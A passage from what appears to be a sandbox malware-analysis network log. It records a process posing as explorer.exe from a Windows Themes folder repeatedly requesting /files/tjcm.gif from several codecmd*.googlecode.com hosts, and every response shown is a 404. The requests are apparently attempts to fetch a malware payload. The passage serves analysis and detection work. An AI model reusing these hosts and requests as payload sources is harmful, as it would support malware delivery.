                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:08.458019018 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.664069108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:10.154377937 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:10.890090942 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:10 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:10.890117884 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.664071142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:12.634852886 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:13.000113010 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:12 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:13.000516891 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.664072172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:14.282217979 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:14.857279062 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:14 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:14.857321024 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.664073108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:17.041480064 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:17.767637968 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:17 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:17.767698050 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.664074142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:19.766412973 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:20.506685972 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:20 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:20.506732941 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.664075172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:21.739964008 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:22.296705961 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:22 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:22.296765089 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.651155108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:23.558990955 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:24.268378019 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:24 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 